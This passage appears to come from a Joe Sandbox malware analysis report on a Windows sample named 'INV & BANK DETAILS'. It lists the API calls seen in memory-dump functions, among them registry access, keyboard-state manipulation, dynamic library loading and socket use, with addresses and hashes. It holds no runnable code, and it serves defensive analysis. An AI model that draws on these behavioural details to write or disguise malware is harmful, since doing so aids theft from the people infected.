                                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                • _memmove.LIBCMT ref: 004656CA
                                • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                • WSACleanup.WSOCK32 ref: 00465762
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                • String ID:
                                • API String ID: 2945290962-0
                                • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                APIs
                                • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                • String ID:
                                • API String ID: 1457242333-0
                                • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                APIs
                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ConnectRegistry_memmove_wcslen
                                • String ID:
                                • API String ID: 15295421-0
                                • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                APIs
                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                • _wcstok.LIBCMT ref: 004675B2
                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                • _wcscpy.LIBCMT ref: 00467641
                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                • _wcslen.LIBCMT ref: 00467793
                                • _wcslen.LIBCMT ref: 004677BD
                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                • String ID: X
                                • API String ID: 780548581-3081909835
                                • Opcode ID: d2e7fab411aea0598dfd2bf5d0f156e5f0b1b051b12d5a137b82cd3b72d64586
                                • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                • Opcode Fuzzy Hash: d2e7fab411aea0598dfd2bf5d0f156e5f0b1b051b12d5a137b82cd3b72d64586
                                • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                APIs
                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                • CloseFigure.GDI32(?), ref: 0044751F
                                • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                • String ID:
                                • API String ID: 4082120231-0
                                • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                APIs
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                • String ID:
                                • API String ID: 2027346449-0
                                • Opcode ID: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
                                • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                • Opcode Fuzzy Hash: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
                                • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                APIs
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                • GetMenu.USER32 ref: 0047A703
                                • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                • _wcslen.LIBCMT ref: 0047A79E
                                • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                • String ID:
                                • API String ID: 3257027151-0
                                • Opcode ID: 16bc5092e07a895739fe4917524b2b0408d510081aeddcc8af370e4710e2e95b
                                • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                • Opcode Fuzzy Hash: 16bc5092e07a895739fe4917524b2b0408d510081aeddcc8af370e4710e2e95b
                                • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                APIs
                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ErrorLastselect
                                • String ID:
                                • API String ID: 215497628-0
                                • Opcode ID: 848e0cba52365b52d90647beadd6ae35a3a81a52641a937a2f15274f1bbe1e15
                                • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                • Opcode Fuzzy Hash: 848e0cba52365b52d90647beadd6ae35a3a81a52641a937a2f15274f1bbe1e15
                                • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                APIs
                                • GetParent.USER32(?), ref: 0044443B
                                • GetKeyboardState.USER32(?), ref: 00444450
                                • SetKeyboardState.USER32(?), ref: 004444A4
                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessagePost$KeyboardState$Parent
                                • String ID:
                                • API String ID: 87235514-0
                                • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                APIs
                                • GetParent.USER32(?), ref: 00444633
                                • GetKeyboardState.USER32(?), ref: 00444648
                                • SetKeyboardState.USER32(?), ref: 0044469C
                                • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessagePost$KeyboardState$Parent
                                • String ID:
                                • API String ID: 87235514-0
                                • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                APIs
                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                • DeleteObject.GDI32(?), ref: 00455736
                                • DeleteObject.GDI32(?), ref: 00455744
                                • DestroyIcon.USER32(?), ref: 00455752
                                • DestroyWindow.USER32(?), ref: 00455760
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                • String ID:
                                • API String ID: 2354583917-0
                                • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                APIs
                                • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: AddressProc$Library$FreeLoad
                                • String ID: Wu
                                • API String ID: 2449869053-4083010176
                                • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                APIs
                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Window$Enable$Show$MessageMoveSend
                                • String ID:
                                • API String ID: 896007046-0
                                • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                APIs
                                • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                • GetFocus.USER32 ref: 00448ACF
                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
